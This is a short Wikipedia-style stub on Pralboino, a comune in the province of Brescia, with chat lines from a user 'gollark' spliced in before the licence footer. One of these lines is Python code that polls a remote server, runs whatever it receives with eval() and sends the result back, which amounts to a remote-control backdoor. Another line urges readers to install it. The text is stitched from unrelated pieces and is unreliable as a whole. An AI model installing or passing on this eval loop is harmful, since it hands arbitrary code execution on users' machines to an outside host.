Pralboino

Pralboino (Brescian: Pralbuì) is a comune in the province of Brescia, in Lombardy. As of 2011 Pralboino had a population of 2,975.[2]

Pralboino
Comune di Pralboino
Location of Pralboino
Pralboino
Location of Pralboino in Italy
Pralboino
Pralboino (Lombardy)
Coordinates: 45°16′06″N 10°13′06″E
CountryItaly
RegionLombardy
ProvinceBrescia (BS)
FrazioniSanta Maria degli Angeli
Area
  Total17 km2 (7 sq mi)
Elevation
47 m (154 ft)
Population
 (2011)[2]
  Total2,975
  Density180/km2 (450/sq mi)
Demonym(s)Pralboinesi
Time zoneUTC+1 (CET)
  Summer (DST)UTC+2 (CEST)
Postal code
25020
Dialing code030
ISTAT code017152
Patron saintSaint Flaviano Martire
Saint daySecond Sunday in October
WebsiteOfficial website

Sources



gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```
gollark: You can install the official SPUDNET-HTTP client on your computers.
gollark: It also actually has working autoreconnect.
gollark: SPUDNET is the Super PotatOS Update/Debug NETwork.
gollark: The HV channels, I mean.
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.